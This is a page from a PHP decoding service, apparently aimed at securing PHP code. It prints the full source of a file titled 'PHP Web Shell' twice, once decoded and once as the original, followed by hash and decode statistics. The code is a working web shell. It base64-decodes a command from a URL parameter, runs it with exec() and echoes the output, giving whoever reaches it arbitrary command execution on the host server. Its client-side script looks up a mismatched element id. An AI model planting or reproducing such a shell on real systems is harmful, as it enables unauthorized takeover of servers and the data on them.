Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<title>PHP Web Shell</title> <html> <body> <!-- Replaces command with Base64-encode..
Decoded Output download
<title>PHP Web Shell</title>
<html>
<body>
<!-- Replaces command with Base64-encoded Data -->
<script>
window.onload = function() {
document.getElementById('execute_form').onsubmit = function () {
var command = document.getElementById('cmd');
command.value = window.btoa(command.value);
};
};
</script>
<!-- HTML Form for inputting desired command -->
<form id="execute_form" autocomplete="off">
<b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />
<input type="submit" value="Execute" />
</form>
<!-- PHP code that executes command and outputs cleanly -->
<?php
$decoded_command = base64_decode($_GET['id']);
echo "<b>Executed:</b> $decoded_command";
echo str_repeat("<br>",2);
echo "<b>Output:</b>";
echo str_repeat("<br>",2);
exec($decoded_command . " 2>&1", $output, $return_status);
if (isset($return_status)):
if ($return_status !== 0):
echo "<font color='red'>Error in Code Execution --> </font>";
foreach ($output as &$line) {
echo "$line <br>";
};
elseif ($return_status == 0 && empty($output)):
echo "<font color='green'>Command ran successfully, but does not have any output.</font>";
else:
foreach ($output as &$line) {
echo "$line <br>";
};
endif;
endif;
?>
</body>
</html>
Did this file decode correctly?
Original Code
<title>PHP Web Shell</title>
<html>
<body>
<!-- Replaces command with Base64-encoded Data -->
<script>
window.onload = function() {
document.getElementById('execute_form').onsubmit = function () {
var command = document.getElementById('cmd');
command.value = window.btoa(command.value);
};
};
</script>
<!-- HTML Form for inputting desired command -->
<form id="execute_form" autocomplete="off">
<b>Command</b><input type="text" name="id" id="id" autofocus="autofocus" style="width: 500px" />
<input type="submit" value="Execute" />
</form>
<!-- PHP code that executes command and outputs cleanly -->
<?php
$decoded_command = base64_decode($_GET['id']);
echo "<b>Executed:</b> $decoded_command";
echo str_repeat("<br>",2);
echo "<b>Output:</b>";
echo str_repeat("<br>",2);
exec($decoded_command . " 2>&1", $output, $return_status);
if (isset($return_status)):
if ($return_status !== 0):
echo "<font color='red'>Error in Code Execution --> </font>";
foreach ($output as &$line) {
echo "$line <br>";
};
elseif ($return_status == 0 && empty($output)):
echo "<font color='green'>Command ran successfully, but does not have any output.</font>";
else:
foreach ($output as &$line) {
echo "$line <br>";
};
endif;
endif;
?>
</body>
</html>
Function Calls
base64_decode | 1 |
Stats
MD5 | f006aab858455e63ce3721aaef54ac57 |
Eval Count | 0 |
Decode Time | 294 ms |